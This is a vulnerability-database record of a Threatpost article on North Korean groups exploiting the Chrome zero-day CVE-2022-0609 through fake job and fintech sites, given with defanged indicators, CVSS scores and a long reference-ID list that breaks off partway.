DATABASE RESOURCES PRICING ABOUT US

{"id": "THREATPOST:C694354BA14A953DAFC9171CB97F0BC2", "vendorId": null, "type": "threatpost", "bulletinFamily": "info", "title": "Google Chrome Zero-Day Bugs Exploited Weeks Ahead of Patch", "description": "North Korean threat actors exploited a remote code execution (RCE) zero-day vulnerability in Google\u2019s Chrome web browser weeks before the bug was discovered and patched, according to researchers.\n\nGoogle Threat Analysis Group (TAG) [discovered the flaw](<https://threatpost.com/google-chrome-zero-day-under-attack/178428/>), tracked as [CVE-2022-0609](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0609>), on Feb. 10, reporting and patching it four days later as part of [an update](<https://chromereleases.googleblog.com/2022/02/stable-channel-update-for-desktop_14.html>). Researchers said at the time that an exploit for the flaw\u2013a [use-after-free](<https://cwe.mitre.org/data/definitions/416.html>) vulnerability in Chrome\u2019s animation component\u2013already existed in the wild.\n\nGoogle TAG now revealed it believes two threat groups\u2014the activity of which has been publicly tracked as [Operation Dream Job](<https://www.clearskysec.com/operation-dream-job/>) and [Operation AppleJeus](<https://securelist.com/operation-applejeus/87553/>), respectively\u2014exploited the flaw as early as Jan. 4 in \u201ccampaigns targeting U.S. based organizations spanning news media, IT, cryptocurrency and fintech industries,\u201d according to [a blog post](<https://blog.google/threat-analysis-group/countering-threats-north-korea/>) published Thursday by Google TAG\u2019s Adam Weidemann. Other organizations and countries also may have been targeted, he said.\n\n\u201cOne of the campaigns has direct infrastructure overlap with a campaign targeting security researchers which we [reported on](<https://blog.google/threat-analysis-group/new-campaign-targeting-security-researchers/>) last year,\u201d he wrote. In that campaign, hackers linked to North Korea [used an elaborate social-engineering campaign](<https://threatpost.com/north-korea-security-researchers-0-day/163333/>) to set up trusted relationships with security researchers with the ultimate goal of infecting their organizations\u2019 systems with custom backdoor malware.\n\nThe two groups, though separate, used the same [exploit kit](<https://www.virustotal.com/gui/file/03a41d29e3c9763093aca13f1cc8bcc41b201a6839c381aaaccf891204335685>) in their campaigns, which signals that they may work for the same entity with a shared supply chain. However, \u201ceach operate with a different mission set and deploy different techniques,\u201d Weidemann said. It\u2019s also possible that other North Korean government-backed attackers have access to the same kit, he added.\n\n## **Two Campaigns, One Exploit**\n\nResearchers revealed specific details about both Operation Dream Job and Operation AppleJeus in the post. The former targeted more than 250 individuals working for 10 different news media, domain registrars, web hosting providers and software vendors.\n\n\u201cThe targets received emails claiming to come from recruiters at Disney, Google and Oracle with fake potential job opportunities,\u201d Weidemann explained. \u201cThe emails contained links spoofing legitimate job-hunting websites like Indeed and ZipRecruiter.\u201d\n\nIf victims clicked on the link, they would be served a hidden browser iframe that would trigger the exploit kit, he wrote. Fake job domains owned by attackers that were used in the campaign included: disneycareers[.]net, find-dreamjob[.]com, indeedus[.]org, varietyjob[.]com, and ziprecruiters[.]org.\n\nExploitation URLs associated with Operation Dream Job used in the campaign included: https[:]//colasprint[.]com/about/about.asp, a legitimate but compromised website; and https[:]//varietyjob[.]com/sitemap/sitemap.asp.\n\nOperation AppleJeus, the work of a separate North Korean threat group, targeted more than 85 users in cryptocurrency and fintech industries leveraging the same exploit kit.\n\nAttackers compromised at least two legitimate fintech company websites to host hidden iframes that served the exploit kit to visitors to the site, researchers revealed. Google TAG also observed fake websites\u2013already set up to distribute [trojanized cryptocurrency applications](<https://www.virustotal.com/gui/file/295c20d0f0a03fd8230098fade0af910b2c56e9e5700d4a3344d10c106a6ae2a>)\u2014that hosted malicious iframes pointing their visitors to the exploit kit, Weidemann wrote.\n\nAttacker-owned websites observed in Operation AppleJeus included one dozen sites including: blockchainnews[.]vip, financialtimes365[.]com and giantblock[.]org, according to the post.\n\n## **Exploit Kit Revealed (Partially)**\n\nResearchers managed to recover key aspects of the functionality of the exploit kit used in both campaigns, which employed multiple stages and components to target users. Links to the exploit were placed in hidden iframes on websites that attackers either owned or had previously compromised, Weidemann wrote.\n\n\u201cThe kit initially serves some heavily obfuscated javascript used to fingerprint the target system,\u201d he explained. \u201cThis script collected all available client information such as the user-agent, resolution, etc. and then sent it back to the exploitation server.\u201d\n\nIf the data sent to the server met a set of unknown requirements, the client would be served a Chrome RCE exploit and some additional javascript. If the RCE was successful, the javascript would request the next stage referenced within the script as \u201cSBX,\u201d which is a common acronym for Sandbox Escape.\n\nResearchers were unable to recover the stages of exploit that followed the initial RCE because attackers took care to protect their exploits, deploying various safeguards, Weidemann said.\n\nThose tactics included only serving the iframe at specific times\u2013presumably when attackers knew an intended target would be visiting the site, he said. In some email campaigns, attackers also sent targets links with unique IDs that potentially were used to enforce a one-time-click policy for each link. This would allow the exploit kit to only be served once, Weidemann said.\n\nAttackers also used Advanced Encryption Standard (AES) encryption for each stage, including the clients\u2019 responses using a session-specific key. Finally, additional stages of the exploit were only served if the previous one was successful; if not, the next stage was not served, researchers found.\n\n_**Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our **_[_**FREE downloadable eBook**_](<https://bit.ly/3Jy6Bfs>)_**, \u201cCloud Security: The Forecast for 2022.\u201d**_ _**We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists.**_\n", "published": "2022-03-25T13:19:59", "modified": "2022-03-25T13:19:59", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "accessVector": "NETWORK", "accessComplexity": "MEDIUM", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 9.3}, "severity": "HIGH", "exploitabilityScore": 8.6, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 10.0, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 6.0}, "href": "https://threatpost.com/google-chrome-zero-day-bugs-exploited-weeks-ahead-of-patch/179103/", "reporter": "Elizabeth Montalbano", "references": ["https://threatpost.com/google-chrome-zero-day-under-attack/178428/", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0609", "https://chromereleases.googleblog.com/2022/02/stable-channel-update-for-desktop_14.html", "https://cwe.mitre.org/data/definitions/416.html", "https://www.clearskysec.com/operation-dream-job/", "https://securelist.com/operation-applejeus/87553/", "https://blog.google/threat-analysis-group/countering-threats-north-korea/", "https://blog.google/threat-analysis-group/new-campaign-targeting-security-researchers/", "https://threatpost.com/north-korea-security-researchers-0-day/163333/", "https://www.virustotal.com/gui/file/03a41d29e3c9763093aca13f1cc8bcc41b201a6839c381aaaccf891204335685", "https://www.virustotal.com/gui/file/295c20d0f0a03fd8230098fade0af910b2c56e9e5700d4a3344d10c106a6ae2a", "https://bit.ly/3Jy6Bfs"], "cvelist": ["CVE-2021-44228", "CVE-2022-0609"], "immutableFields": [], "lastseen": "2022-03-25T13:59:23", "viewCount": 675, "enchantments": {"score": {"value": -0.6, "vector": "NONE"}, "dependencies": {"references": [{"type": "akamaiblog", "idList": ["AKAMAIBLOG:61BDCEC3AEF8E6FC9E12623DB54E8144", "AKAMAIBLOG:65F0FA2139A357151F74FA41EF42B50F", "AKAMAIBLOG:7E872DA472DB19F259EC6E0D8CA018FF", "AKAMAIBLOG:B0985AEDEB4DAED26BDA30B9488D329D", "AKAMAIBLOG:B0DBF0121097FA293565FB7E66E09AB3"]}, {"type": "amazon", "idList": ["ALAS-2021-1553", "ALAS-2021-1554", "ALAS-2022-1580", "ALAS-2022-1601", "ALAS2-2021-1730", "ALAS2-2021-1731", "ALAS2-2021-1732", "ALAS2-2022-1739", "ALAS2-2022-1773", "ALAS2-2022-1806"]}, {"type": "amd", "idList": ["AMD-SB-1034"]}, {"type": "apple", "idList": ["APPLE:251C897D47AD6A2DB0B7E3792A81C425"]}, {"type": "atlassian", "idList": ["CRUC-8529", "FE-7368"]}, {"type": "attackerkb", "idList": ["AKB:0B6C144F-2E5A-4D5E-B629-E45C2530CB94", "AKB:21AD0A36-A0AA-486B-A379-B47156286E9E", "AKB:3191CCF9-DA8E-43DF-8152-1E3A5D1A3C45", "AKB:398CAD69-31E4-4276-B510-D93B2C648A74", "AKB:B1318EAC-2E60-4695-B63B-2D10DAAA5B0E", "AKB:DEE6BA54-6F2D-4A58-9654-B21DD42E3502", "AKB:F2A441BA-2246-446C-9B34-400B2F3DD77B"]}, {"type": "avleonov", "idList": ["AVLEONOV:469525DB37AAC7A2242EE80C1BCBC8DB", "AVLEONOV:84C227D6BCF2EBE9D3A584B815D5145A", "AVLEONOV:89C75127789AC2C132A3AA403F035902"]}, {"type": "cert", "idList": ["VU:930724"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0936", "CPAI-2022-0094"]}, {"type": "checkpoint_security", "idList": ["CPS:SK176865"]}, {"type": "chrome", "idList": ["GCSA-5842936521181266609"]}, {"type": "cisa", "idList": ["CISA:006B1DC6A817621E16EEB4560519A418", "CISA:380E63A9EAAD85FA1950A6973017E11B", "CISA:45B6D68A097309E99D8E7192B1E8A8BE", "CISA:6C962B804E593B231FDE50912F4D093A", "CISA:8367DA0C1A6F51FB2D817745BB204C48", "CISA:88950AD3AEDA1ACA038AD96EE5152D39", "CISA:918B5EC3622C761B0424597D3F7AFF7C", "CISA:920F1DA8584B18459D4963D91C8DDA33", "CISA:F3C70D08CAE58CBD29A5E5ED6B2AE473"]}, {"type": "cisco", "idList": ["CISCO-SA-APACHE-LOG4J-QRUKNEBD"]}, {"type": "citrix", "idList": ["CTX335705"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:690C01663F820378948F8CF2E2405F72"]}, {"type": "cve", "idList": ["CVE-2021-3100", "CVE-2021-4104", "CVE-2021-44228", "CVE-2021-44530", "CVE-2021-45046", "CVE-2022-0070", "CVE-2022-0609", "CVE-2022-23848", "CVE-2022-33915"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2842-1:95CB4", "DEBIAN:DSA-5020-1:32A64", "DEBIAN:DSA-5022-1:D26EE", "DEBIAN:DSA-5079-1:4C05B"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2021-4104", "DEBIANCVE:CVE-2021-44228", "DEBIANCVE:CVE-2021-45046", "DEBIANCVE:CVE-2022-0609"]}, {"type": "exploitdb", "idList": ["EDB-ID:50590", "EDB-ID:50592"]}, {"type": "f5", "idList": ["F5:K19026212", "F5:K24554520", "F5:K32171392", "F5:K34002344"]}, {"type": "fedora", "idList": ["FEDORA:0A343304CB93", "FEDORA:548FD3102AB0", "FEDORA:59AA230A7074", "FEDORA:95A5B306879A", "FEDORA:A5A703103140"]}, {"type": "fortinet", "idList": ["FG-IR-21-245"]}, {"type": "freebsd", "idList": ["1EA05BB8-5D74-11EC-BB1E-001517A2E1A4", "3FADD7E4-F8FB-45A0-A218-8FD6423C338F", "4B1AC5A3-5BD4-11EC-8602-589CFC007716", "515DF85A-5CD7-11EC-A16D-001517A2E1A4", "650734B2-7665-4170-9A0A-EECED5E10A5E", "93A1C9A7-5BEF-11EC-A47A-001517A2E1A4", "E12432AF-8E73-11EC-8BC4-3065EC8FD3EC"]}, {"type": "gentoo", "idList": ["GLSA-202202-02"]}, {"type": "github", "idList": ["GHSA-3QPM-H9CH-PX3C", "GHSA-7RJR-3Q55-VV33", "GHSA-FP5R-V3W9-4333", "GHSA-J3CH-VJPH-8Q6V", "GHSA-J7C3-96RF-JRRP", "GHSA-JFH8-C2JP-5V3Q", "GHSA-MF4F-J588-5XM8", "GHSA-V57X-GXFJ-484Q", "GHSA-VV6J-WW6X-54GX", "GITHUB:070AFCDE1A9C584654244E41373D86D8", "GITHUB:D32BE0B8A571761A967462652837D28F"]}, {"type": "githubexploit", "idList": ["00264586-32AF-5469-819B-90FBDA0B6FF2", "00423BD1-64DA-5DB0-848E-1BACC0883E15", "0099FB22-A94E-5D32-9BC4-2EC6D5CFFA9C", "016A0841-D1FF-5056-B062-0D08FCE624CB", "0241DC13-63CB-580C-BDC6-78F8BB03567D", "030066BA-6C48-5AD9-9EAF-11DECB6A3930", "034AFC0C-D411-5F4A-BBAB-630A6C972933", "03C230DA-F801-5660-BF8E-AB8F44E2755C", "0568D2CD-87AF-5D34-AA65-868B1DDA0A89", "0577D04A-4517-5872-B4C0-E45DD6246D88", "066BA250-177D-5017-9AC2-6B948A465ABC", "06D271D5-7A61-5692-9778-7F521D52F980", "0793D7AB-F57C-5832-B456-4057704CAEC9", "07C462E5-20A3-5023-B363-47E1B0C1AE4E", "09509FA9-9FC3-5B64-900D-F0842DC8BCF7", "09F9BA9F-83A2-52EF-81A0-214FCD9E240D", "0A26B4F0-3175-58BE-9CE7-133C9D85E181", "0ABA9FB5-93DD-59F1-9580-232DBFBB4AD8", "0B596CD2-49C7-50A8-A43C-8DE3027EC2B7", "0BC62E37-D6E2-5B2C-BF89-3E00D98D2E30", "0C98B78F-B467-5298-825B-05ECB4EE2653", "0CBB2E72-C52F-59B6-BD73-DBDD206C4C35", "0CEA12C7-97F6-5BF5-88FF-6797542A037F", "0D243A34-B42E-5007-90D0-A30ECABDA204", "0D4B651A-4424-55FE-B496-1BB733DE7EE2", "0E43C674-363B-53C2-8686-6F412A995AF4", "0E47338D-BDC0-510A-BC15-093F2E1DEF2C", "0E8471F7-D213-552B-ABD8-B3B1FAD4B910", "1097EF60-FC77-5135-B92B-4A84B46FABAF", "11719BED-E629-5C79-944E-7E40BBFC460C", "126A30D2-0273-510B-B34A-DF7AE6E0C1C0", "129B39DD-AB9E-54F0-B6B4-5EA17F29B7DF", "12AAE278-1B08-5F3E-AC28-8EC928D3D7C8", "13542749-F70C-5BAA-A20C-8A464D612535", "1370FA0C-A273-5E82-9EEB-7E2E5628D23E", "13EDAA06-F1A5-5097-AD3A-3D6129C325A7", "141F2E38-979B-50B5-B649-96785B255523", "14482532-2406-58DF-89FF-30B085015257", "149F99C3-6B62-5255-8DA6-A0370E6ED5F7", "14E4E272-9457-53A0-ADD5-F91385D04FCD", "161B70B2-DFA5-54B6-A4CE-45B79999AAC6", "16B2ABBF-5997-58A1-A4C9-0161F64D116C", "16C11F1E-B5B4-508E-8238-6BF3458B34D3", "16EB55EE-7CC4-58C7-86AC-E9FD7066B5F1", "170912E2-BB33-5CB8-AD90-C0A737FCAC5E", "17C204F9-DD70-5EFB-89D4-B642E65FAF99", "1AD6F414-6637-555A-AA79-BEE90EDB10AB", "1B11A8A4-B07C-580C-AF38-33A50B17B19A", "1B8CBBEC-5ABA-5792-8D2A-A51EB4CC6352", "1C354B89-0050-508B-98F4-B43CBD84F364", "1CC6B535-3451-5066-8C2E-94551FEC545E", "1CCC4512-40AB-5F72-9913-3D894DB4676F", "1D3D13FB-46D9-572A-A304-FEEC4619D37B", "1E085D9B-26F5-5960-938C-AEB76BCE61D8", "1E62A076-94ED-5061-AE4F-432BB8D7A59C", "210D354B-2338-5AA4-BB87-981C2D2BAA06", "21AACF78-8053-529E-909E-B6D5158008AC", "21B5671D-2A35-52FF-9702-380A32B96260", "21F23081-849E-5B0D-AB61-A8EB37CA0B38", "22AAF71B-053F-5E71-9F26-039C48FCCD62", "22C2FC0C-2C78-5EF7-B21B-5B76E82E2E99", "22C736D4-4179-585F-990B-A40436F65461", "231364E1-A2B1-558A-B805-F242AA97B13F", "23A2D479-181C-599C-9C0F-9A2FF201348F", "2421E200-716C-5F29-84C0-DD8B9C41D92E", "24682F53-DE0E-5967-AAC7-98806644A14C", "24751999-698F-5052-988C-193144F85A39", "254068B4-97B4-5DCF-A60F-5206B6DD230E", "26FD2B5F-2952-5624-8CB5-3ECD4480DA87", "27D73012-7283-5C8D-8197-BBAE1964DEE3", "29A41C2D-FF26-591A-A88B-DDB396742BBC", "2A95146E-A404-5015-9D39-293C8EAFF4B6", "2AA77664-83AA-50B1-9F4E-37CC67A5CFAC", "2AF28508-1272-5281-BDB7-B44D3EFC7C72", "2AF7350D-AB79-5AB5-8AF9-0F351CE13D30", "2B297EB1-A602-5F7B-B21B-C34BC6EB4308", "2D2BE5CB-742A-5912-9D88-75365533F9E2", "2E7FF2D4-97E7-54F5-A5C8-EACD22FCF303", "2E946B1D-12B1-56D1-A72E-A3026C240B1D", "2EACBFB9-2956-564B-A859-6C85EF9F785A", "2F792C33-6CC6-58F1-9166-4DEA421DE2C3", "2F83846E-DF16-5074-98CB-01158DE1C6C6", "30BD2114-A602-52D3-908F-8B66A46F1A8C", "30C6DF99-400E-539F-AA8D-39E7407F4796", "31E7D7EA-2E1F-59D8-8BD7-81B8A4894F91", "32BB43C3-F80D-5CBF-83AD-55BD38C2A440", "342CC1B7-6E24-5767-A7B1-90B95A91B503", "34DFC7F1-8012-5B3A-B9F1-EFEDB5F89D1D", "3549B000-260E-5A24-9573-935F898D149C", "356A7EC9-4E47-52B9-856C-0215B3D9C70E", "35A70212-DFFC-5B38-8294-2B835B8080DE", "371D4A15-51B5-520B-B31D-856E557695FD", "3734D8ED-657E-5585-B181-DE9BE2D84456", "38AF0E71-397C-5A1E-B67C-5514D8F8ABC8", "39A13697-AF09-5E14-9DE2-045005EA9D85", "39D0749D-74E3-5D08-804A-6E7E52BCE692", "3A118B0C-1B94-5CA7-81D3-2A3230EB4DC9", "3A1D442B-2B5B-5DEA-9276-9A9B6C06C9DF", "3A8F706B-1F40-5DAB-AB25-BA023D568AFA", "3AAA878D-C72A-52A0-A5B6-0977BAF6F01D", "3ACF6BFE-C853-50C6-BD49-B76794B8BA53", "3B7408B1-9041-550E-9CB8-83E5F609C37B", "3D8E1FE1-17FA-5A92-B109-DEDB55A6BEAB", "3DF3AA17-94C8-5E17-BCB8-F806D1746CDF", "3DFE8091-03AE-565B-A198-BD509784502C", "3E142E8E-743B-5786-9EB8-0FED1933F71D", "3EA1CA63-F1F5-5A86-AB97-E327DAE18E93", "3FB46D12-73E5-58EF-BC2A-4FC103B8FF72", "4066A0A4-284D-5ECC-A476-ADDA61AF9A76", "4096BFF5-03AE-5DA0-8AD6-85D69E2570C1", "40C633CE-4DD0-586D-8773-760E9A70FFBD", "4142DC43-FEB5-5B62-B8C7-B2A4DEB336A6", "42098CCD-C708-53FC-B3CD-5A8356B69359", "4288177C-C609-5D55-A845-D6785929AB4D", "43159333-A26E-5929-A289-0C84DDCF9DEA", "43A7C9D3-EBB3-57B1-B8FB-C651B36501C2", "43CEFD04-EB9B-5765-AB94-8FF76127F1F6", "44463794-7940-582A-AFFF-676628A86A72", "444C7644-3DE2-57B2-ACF8-C2B157E07580", "44DBFE24-1B30-510A-8291-B7043C7FF654", "4557B39D-1DE6-59FA-AF6C-935E8BB15AE5", "45E71437-8181-5EB7-91BD-D6E4343DA0AB", "473FFDA9-E615-53B6-9A81-F98A1ABD700E", "47670E23-A165-5F5D-8C90-5C76DA1ADFEE", "479EB930-7609-5244-8E16-0D8689304D86", "4804958E-7699-5226-91C3-8110A4CBAB18", "48821FC8-9320-5568-88A3-9B2CC655ADAC", "4A0D603B-6526-5D1E-BADC-55B4775C354B", "4B070EB0-B690-5547-8809-F1A697118957", "4B1180FB-F4A3-5FCD-A8D2-65364D1EA9EC", "4B30BFBE-6FDC-5580-9C76-65EA4EBA5DAC", "4B38D813-5C4B-586B-930A-FDDD0FFF304B", "4BD74B8C-D553-57C6-AB15-6B899401AAA4", "4C6A108D-3631-56AD-8C3B-9677A228693B", "4DBC05D1-8178-5715-953D-61ECC89104F4", "4F11FB83-F6EC-5ED2-B08D-9D86D6104DC7", "4F57CC9C-B908-544E-92E7-92A49DE89B00", "4F757EF2-574B-55C7-A017-51DC8BB28C31", "4FBD8560-2AEB-5AD2-9CA3-4A72DEDDE929", "51879B5C-E36F-52B7-B92C-DBA73A21F67D", "5233D0F2-69A2-5220-8016-07D66C226F01", "52BA1465-B7E9-59C1-A20F-E38A5EAE272D", "52E35A88-6217-55CC-B812-4EE83CECD8EB", "53A3C2F6-6EF2-52C1-924B-F3A9C95C2A88", "542348EC-7B83-50E0-8F9B-B6AE9968059F", "547FC254-3B26-59EC-AF4D-E5954678AC3D", "54AB8DD9-4A52-50E4-9EE2-046EBD899FFD", "54E7D93D-9216-5EDE-A4AD-8324A367E67B", "54FE5E76-EAF4-5D84-B37F-06F12A6AFF71", "553C3CC1-0126-5554-8BE0-5F577271EBF9", "55AD7FBC-06FB-5D26-A3A6-F9E9D63D45AC", "5644D9A0-3A8F-52F3-AE3E-300C79911A07", "57742B88-2AA6-5788-825F-92A73CA85718", "578E61DA-1B13-5170-9DAC-60D30F7F8C99", "58ACC402-1947-5FE3-9D08-021A4EFEC48A", "5A5A28A1-2601-54F3-BA06-BCFF1A9DCCA5", "5ABB537C-AD08-57E9-9A29-E747D7C29DE9", "5B1D95CD-139F-5304-8B13-BB4EDD912DFA", "5B6C990F-05A3-5D83-83DF-386A34FB8560", "5C040112-8DE7-57AA-B52D-BDD1965D02E3", "5C116D88-E2CC-5BC3-9A71-3174292E227D", "5CEF4882-D1D5-5861-944F-34E8868BF986", "5D72C8DC-DFFD-56F3-A7AC-9FA83C48F460", "5E633D2D-95D0-5498-840F-EA92BF2C5A00", "5E9FB294-1E29-5DE8-A6F6-6D25B08A31DC", "5FB1E3FD-68C6-50CF-85EF-DBFC0B133C24", "5FC55783-FDF5-5AD8-98B2-C1CBFB4EFCCA", "5FDC1BB6-C937-5F78-BB2D-71584272E00A", "6083DCC3-CA9C-58A4-9FBC-983DF1E52584", "608B43BB-B31C-5B8A-A962-A58902AEBF2E", "61AC9232-A772-5D63-9DFC-BFE4976418C7", "62F5F8D4-29D7-5B5C-82BC-3D56E7E8D027", "634605C6-F76D-5EDD-9986-EC4EC593168D", "63500AE8-A10A-5388-B314-001A4CFBDFBD", "6413E08F-7E60-50ED-932E-527F515A6C19", "645452DF-222B-51AD-963D-DB002A1FC803", "65EB18B2-8DBB-5A70-9080-C6DA4451D7E7", "6600C311-30E5-566D-98F1-AC47E752EBEA", "67E20854-0E30-5FC1-9F24-6A60531BAFF6", "68DCAE72-CB86-55B9-9CB6-653918238C2B", "6A34D9C3-C290-5763-BAF4-F1D6351C4BA2", "6A4495E8-D723-5923-BB6A-B9EA838CF69B", "6AC0E68D-D6F7-55D9-A281-30D7E76D7556", "6BC5CBC6-5A96-5743-8FB7-CEDDF527C52A", "6CC29A1A-24F4-5961-89F9-E7B824C6F37C", "6D93189D-E2D8-5571-88D5-D778E1CB9C23", "6DA59A94-0CD1-5357-8F01-2BF3230F9017", "6F10C51B-BF15-522B-B1CB-BA95361D556E", "6F20D8B7-C252-5759-B02B-F8E2C9D42E38", "6F251270-3935-58F4-835C-C9D26FA97CD6", "6F7E4100-F6E7-5C57-8A1B-89F03DCC53A6", "6F93E170-75AD-5F5C-B7CC-6C4CEAA695AB", "700E9EFF-DFA6-504F-8DD1-FB1A62E01721", "70582B5B-E1E6-5767-94A6-39740A96A052", "70EDCB3B-9053-5056-980C-AC3123913F04", "71594B4E-D7FE-534F-8E37-71A1EE08E2E9", "71D962ED-2525-53CE-88D0-D8CD92FB0C02", "743571E7-B8EE-5E77-B047-E2E001379ACE", "75180259-16B4-5B60-9913-BFC9A306560A", "75876A50-BD9B-5991-9E42-7A343A97C890", "76E7C0B8-1EE5-543A-A48E-E3AAEAA8BFF6", "76F6F494-8855-5F94-9675-4474FFFA65A1", "77BE16D3-FEC9-51E3-ADB4-250D5BE6CBD2", "780AD920-FF08-55C6-84C8-A8536C6F5527", "7865A97A-CD10-5E45-9429-CF5F72A6952B", "78C2256A-8ABF-5E34-9268-2EEC0C09E567", "78CE8E59-092E-5214-9D02-A3F5F62F22E9", "7948E878-9BFE-5FEB-90AE-14C32290452F", "798B7BE8-4F94-5D15-A93C-CFE73333BDC5", "799DA5B7-BCF7-56C7-80E8-EAF2351D78F1", "7A3F31B5-D371-54B1-A81B-3863FBC71F0E", "7B2DA44B-D36F-56A4-B4D8-376B8D2F5586", "7B48A97D-242D-55E0-8A13-BD2727C1261F", "7B9BDDBA-81E8-5739-B3F7-419C0D6E2316", "7BB30379-8D57-5FD7-A90C-1A24B1846A23", "7BCC0C24-A1F7-531E-B1BA-342D21C9AF02", "7D70E261-1C9F-517E-88BB-62776C7EE1F1", "7F93036E-3036-56D2-97C5-CFAEAB8DB6F2", "8021D807-3EDC-55A7-A9ED-A364159FADEE", "817FB04E-AFFE-567B-8A2C-64C0A8923734", "81A94AF3-F3C2-5DAE-9C64-154CF9502B01", "865C5B8F-B074-5B0D-834A-E714EB00ADFC", "867C95E5-9596-5E6D-BC2F-FC7A610F3A3E", "8697646B-BC1C-5EEB-84C6-2F209E41B64E", "86CE8F3E-1859-58C8-97B5-8D53531EE22A", "87378E23-9FC7-5BA6-BA12-83E90D9581DD", "8ACDC1C6-CE43-5600-9F6F-644A7AD0DA2B", "8B324F0D-EA80-53B5-8ECF-EB5FC5C0EA13", "8D0CF3A6-EC3F-536C-A424-08879FF2F158", "8D604793-908D-5C35-A3EF-6D2688A10312", "8D6FB9A2-59E2-5565-A2C4-B00D9AE074CF", "8E16065C-63FB-554A-B463-A1E8582A334F", "8E1F0596-03B7-5FCC-8A29-3A8B45D02198", "8F15A064-7841-5899-84CE-8C298A269F83", "8F362564-1631-5AF9-BB38-D1BFC4678DAE", "8FB716EC-9A35-5F93-9759-B27A58B52CF8", "9227EA61-CA01-5E0A-AF8D-22B03C07A27A", "926942FE-1507-5B71-9266-0A5EDC38EE50", "9297A534-2B19-597A-8952-6EC15EE80BFF", "931205E1-36E0-52BF-A978-D4C326F6A32A", "9326CB66-BADC-5643-B118-F38C39A9E34C", "9327CBCC-5FA0-5155-9C98-3F1488EF2F57", "945E86E8-E114-5F51-991C-13742C6EF49E", "9470FC0C-FB21-50C3-B4E9-5AB439EE325C", "94966928-86D4-5285-9A57-CBDD8F2EF438", "94A8FFF1-6A48-57CB-9340-D6806F47EFA0", "94E003E0-82AE-5CFE-8818-DBA1610BDE3B", "95033F5C-FFFE-58C2-9799-C77E326ACD83", "952CB700-FA2F-5221-96B9-2656F967B63E", "958F00F1-C4FC-5213-82EA-290A530F859B", "977D06B3-F888-5FFF-8749-BF8AF7868ED6", "9790154B-5F28-5BD4-8541-6EAA8D3E2B36", "97D358EF-90F6-5D12-981B-DAFEB56F784F", "97F1C960-A343-5B1E-B261-4834CF80B790", "98F6C0C3-FC5E-5580-A148-55F2368B18C1", "99A0AA73-B93D-56EF-930D-4FD64A4F4D35", "9B0163DC-EE41-5E66-9AA8-A960262A2072", "9D8C431A-57F3-560C-8146-1232C2C029C2", "9DAC062A-CFE4-5BB0-983A-8BAB512CF589", "9E16D977-AA24-57C3-9BD1-98296F3186F5", "9E4C737D-2D3C-5A43-B638-E131903225BC", "9F3ABA17-E33A-5018-9DCB-AECDD8DE9DEE", "9FE4ADCA-7F2C-505F-AE74-C635FF2CDF75", "A19F503A-900B-5929-8182-4BD7B1043185", "A1E14906-26B2-5DF8-95E3-07736CC5DDF2", "A39E4181-7C85-5B10-B0F9-AD286D09BD2A", "A454A9CC-C18E-56A1-B166-1A0E244E0493", "A57FBD78-A654-5CEE-8291-163C8AFB7210", "A5B4FB6B-123B-544F-A4E4-46B0595C1C72", "A6308120-6A99-5D2D-A1F7-6384AC37959C", "AB801839-51E0-5EFE-B00D-ABBB6391399A", "ACB6C453-F1D5-5A65-91C2-DF455B997075", "AE0FE928-3464-53AA-BBD2-B3F9E871CEDD", "AF45C6B5-246A-5363-8436-954018BD121C", "AF45D2D0-2D0E-5BD1-89DC-2E2C8E440A75", "AF93C0CA-BFDD-5C90-9D8D-55350790E1D1", "AF987350-FFD2-5814-AF7B-55862F1A8AFE", "B09C4EFC-2C66-5CA8-910F-E21D17B89608", "B22E3A22-BF14-5660-977A-2D28D2AA2500", "B32ED3B3-2054-5776-B952-907BE2CBEED6", "B4A4F7BE-BF43-5BB6-A4A7-A22C6B9DDCA5", "B596B144-65DB-5863-8244-67AEE883C50E", "B6987F3B-86A1-5FDC-AD92-EAF6D264C14A", "B8D5B910-B397-520E-9526-FE32D86E93D8", "B9A69678-D96F-528D-B436-366259B4A283", "BA8F1657-CF64-574C-81BA-6432D5A351D4", "BADF55AF-60C5-5E33-BC19-5DC25FB9E196", "BD1B0180-DA8D-5255-B3FE-EB6CBC730206", "BD33CC4D-EC56-5A22-A712-1B23F8FB141D", "BE4B2B71-B588-5666-9A02-7855DBD45762", "BE66A9B6-104B-5F49-918A-8B913CE46473", "BFB49B3A-706B-5625-9899-54FCB1EE767B", "BFBBD550-B2CF-524B-87F6-D0A8980CDFD3", "C0AE83D0-09A6-58EA-A244-1E453E699C04", "C14C47DA-F04C-56CC-955A-FF12A410D2F5", "C1878361-BBB3-5A2F-8212-945883518690", "C20BAC49-21F2-5BE4-B97B-2561BD95A1A8", "C306DCEF-59B3-5147-8169-3674490BD35F", "C3153E8C-0590-5D96-8EDC-AEE7E129246E", "C3C6029E-8A78-5C0B-9CF6-51489E455464", "C3DA2A71-DD68-5EF3-AC4C-5A10DECD333B", "C3E394AB-E22C-5A6A-B5AF-2A497DDAC7BA", "C45EBEA7-DE2F-5373-9AA5-334E20EA2D23", "C5531AD4-9DFE-5A81-97D2-D34FD02E2AD6", "C640B511-D1E9-5F57-964D-3826F1C68DF8", "C68080B0-3163-5E76-AD65-2B454DBB95EE", 